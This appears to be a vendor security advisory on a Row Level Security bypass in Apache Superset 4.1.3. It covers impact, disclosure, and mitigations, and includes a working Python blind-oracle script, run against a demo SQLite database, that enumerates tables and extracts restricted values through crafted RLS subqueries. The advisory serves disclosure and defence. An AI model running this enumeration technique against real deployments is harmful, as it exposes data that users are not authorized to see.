OX Research Uncovers Critical RLS Bypass in Apache Superset v4.1.3 Affecting All Deployments
Severity: Critical
Affected Versions: All versions of Apache Superset, including v4.1.3
Impact: Row Level Security bypass allowing low-privileged users to infer and enumerate data from restricted datasets, enabling systematic database enumeration
TLDR
Apache Superset is an open-source platform for data exploration and visualization, capable of handling very large datasets. Originally developed at Airbnb in 2015, Superset is now used by many organizations to create interactive dashboards and run SQL queries directly on connected databases through its SQL Lab interface. As of 2025, Superset has over 69,000 stars and more than 16,000 forks on GitHub, reflecting a vibrant and active open-source community.
The OX Research team exploited an access control bypass in Apache Superset (v4.1.3) that lets low-privileged users infer and enumerate data from restricted datasets. Because the leaked signal is a difference in query results or error behavior rather than the data itself, the technique works as a blind oracle and enables systematic enumeration of the underlying database.
Impact
- Unauthorized inference and enumeration of sensitive data
- Exposure of database schema, table names, and metadata
- Bypass of Row Level Security and dataset-level access controls
- Increased risk of further exploitation based on leaked structural information
Who Is Affected?
All organizations running Apache Superset, including the latest version (v4.1.3), are potentially affected. Any deployment where users have dataset-level access with RLS enabled is vulnerable, allowing low-privileged users to infer data and schema information from restricted datasets. The exposure is bounded by the database account behind the affected connection: a subquery can only reach tables that the account Superset connects with is allowed to read.
Based on Shodan, over 20,000 publicly accessible Superset instances could be exposed to this issue.
Responsible Disclosure
We contacted the Apache Superset team on July 14, 2025, and they responded that a fix would be issued.
Recommendations
- Apply security updates and patches once the Apache Superset team releases a fix
- Until then, limit who can define RLS filter clauses to trusted administrators, since the clause text is what reaches the database
- Connect each database with a least-privilege account that can only read the tables Superset is meant to expose, so subqueries in a clause cannot reach anything else
- Review existing RLS clauses and query logs for subqueries (SELECT, EXISTS, UNION) or references to tables outside the dataset they are attached to
Technical Analysis
Attack Scenarios: How could this be exploited in the wild?
- A low-privileged Superset user crafts RLS filter clauses containing subqueries that reference restricted tables.
- By observing differences in query results or error behavior (for example, rows returned versus no rows, or a database error when the referenced table does not exist), the attacker infers the existence of tables, schema details, and data values they are not authorized to access.
- The leaked metadata can then be used to target sensitive datasets or support further attacks against the underlying database.
Attack Graph

How it works
Apache Superset applies Row Level Security (RLS) rules by appending user-defined filter clauses to dataset queries as a WHERE predicate. Due to insufficient validation of these clauses, a low-privileged user can include subqueries that reference tables outside of their authorized scope. Although Superset denies the user direct access to those datasets, the database still evaluates the subqueries with the privileges of the connection's database account. The result of the permitted dataset query therefore depends on data the user is not allowed to see: a true predicate returns rows, a false one returns none, and a reference to a nonexistent table produces an error. By observing these differences, an attacker can infer the existence of restricted tables and data, enabling systematic enumeration and bypass of Superset's dataset-level access controls.
While testing the latest version of Apache Superset (4.1.3), we created a user named test_user with access limited only to the “messages” dataset:

When attempting to directly access the public."FCC 2018 Survey" dataset as test_user, access was correctly denied:

Because the response to the "messages" query changes depending on values in tables that test_user cannot access, we were able to develop a Python script that systematically enumerates the presence of tables across the database. The script submits RLS clauses containing subqueries against candidate table names and uses the resulting success-or-error behavior to infer which restricted tables exist, as demonstrated in the images below:

This made it possible to enumerate the tables in the database and infer their contents, despite test_user lacking direct access permissions. By crafting targeted RLS clauses and analyzing the system's responses, we could infer the structure and contents of restricted tables, effectively bypassing Superset's dataset-level access controls.
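The following Python example, added here to illustrate the mechanism described in this section and the attack scenarios above, is not OX Security's enumeration script and not Superset code. It uses an in-memory SQLite database as a stand-in for a Superset connection: the `messages` table plays the dataset test_user may query, and a made-up `fcc_survey` table stands in for the restricted "FCC 2018 Survey" dataset (schema and rows are constructed). `dataset_query` mimics the shape of a dataset query with an attacker-controlled RLS clause appended; the oracles built on it enumerate tables via the error channel and extract text and numeric values via the row-count channel. The closing `is_safe_rls_clause` check is an illustrative hardening idea (a column and keyword whitelist), not Superset's actual fix.

```python
import re
import sqlite3

# Constructed stand-in for a Superset database connection. "messages" is the
# dataset test_user is allowed to query; "fcc_survey" stands in for the
# restricted "FCC 2018 Survey" dataset. Schema and rows are made up for the demo.
def build_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE messages (id INTEGER, body TEXT);
        INSERT INTO messages VALUES (1, 'hello'), (2, 'world');
        CREATE TABLE fcc_survey (respondent TEXT, income INTEGER);
        INSERT INTO fcc_survey VALUES ('alice', 52000), ('bob', 71000);
    """)
    return conn

def dataset_query(rls_clause):
    # Shape of the query the advisory describes: the authorized dataset's base
    # query with the RLS clause appended as a WHERE predicate. The database,
    # not Superset, evaluates whatever the clause references.
    return f"SELECT id, body FROM messages WHERE ({rls_clause})"

def run(conn, rls_clause):
    # The two signals an attacker can observe: a row count, or a DB error.
    try:
        rows = conn.execute(dataset_query(rls_clause)).fetchall()
        return ("rows", len(rows))
    except sqlite3.Error as exc:
        return ("error", str(exc))

def clause_true(conn, rls_clause):
    # Boolean oracle: the permitted dataset returns rows only if the clause,
    # including any subquery over a restricted table, evaluates to true.
    status, count = run(conn, rls_clause)
    return status == "rows" and count > 0

def table_exists(conn, table):
    # Existence oracle: a subquery on a missing table raises a DB error,
    # while one on an existing table (even a forbidden one) runs normally.
    quoted = '"' + table.replace('"', '""') + '"'
    return run(conn, f"EXISTS (SELECT 1 FROM {quoted})")[0] == "rows"

def enumerate_tables(conn, candidates):
    # Wordlist-driven schema enumeration, one probe query per candidate name.
    return [t for t in candidates if table_exists(conn, t)]

def extract_text(conn, table, column, alphabet, max_len=32):
    # Prefix-by-prefix recovery of the first value in the restricted column
    # that matches, using LIKE '<prefix>%' inside the subquery.
    known = ""
    for _ in range(max_len):
        for ch in alphabet:
            guess = known + ch
            probe = f"EXISTS (SELECT 1 FROM {table} WHERE {column} LIKE '{guess}%')"
            if clause_true(conn, probe):
                known = guess
                break
        else:
            break  # no character extends the prefix: the value is complete
    return known

def extract_int(conn, scalar_subquery, lo, hi):
    # Binary search on a scalar drawn from the restricted table; each probe
    # asks the database "is the value greater than mid?" via the row count.
    while lo < hi:
        mid = (lo + hi) // 2
        if clause_true(conn, f"({scalar_subquery}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo

# Illustrative defensive check (an assumption of this example, not Superset's
# fix): accept a clause only if every identifier is a column of the dataset
# itself and every keyword comes from a small predicate vocabulary, so that
# SELECT/EXISTS/UNION and foreign table names are rejected before they reach the DB.
_ALLOWED_WORDS = {"AND", "OR", "NOT", "IN", "LIKE", "IS", "NULL", "BETWEEN", "TRUE", "FALSE"}

def is_safe_rls_clause(clause, dataset_columns):
    without_strings = re.sub(r"'(?:[^']|'')*'", "''", clause)  # ignore string literals
    for word in re.findall(r"[A-Za-z_][A-Za-z0-9_]*", without_strings):
        if word.upper() not in _ALLOWED_WORDS and word not in dataset_columns:
            return False
    return True

if __name__ == "__main__":
    db = build_demo_db()
    print(run(db, 'EXISTS (SELECT 1 FROM "no_such_table")'))
    print(enumerate_tables(db, ["users", "fcc_survey", "messages", "orders"]))
    print(extract_text(db, "fcc_survey", "respondent", "abcdefghijklmnopqrstuvwxyz"))
    print(extract_int(db, "SELECT MAX(income) FROM fcc_survey", 0, 1_000_000))
```

Each probe is a legitimate query against a dataset the user is allowed to see, so dataset-level authorization never fires; only the database account's own privileges bound what the subquery can read, which is why a least-privilege connection account limits the blast radius even before a fix is applied.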
Too Good to BI True
This advisory is part of Too Good to BI True, OX Security's research into the security posture of the most widely deployed open-source Business Intelligence platforms. Across five platforms, our researchers achieved full exploitation chains in every single one, reaching data that should never have been accessible. The findings include four zero-day discoveries and over 45,000 publicly exposed instances.
Read the advisories: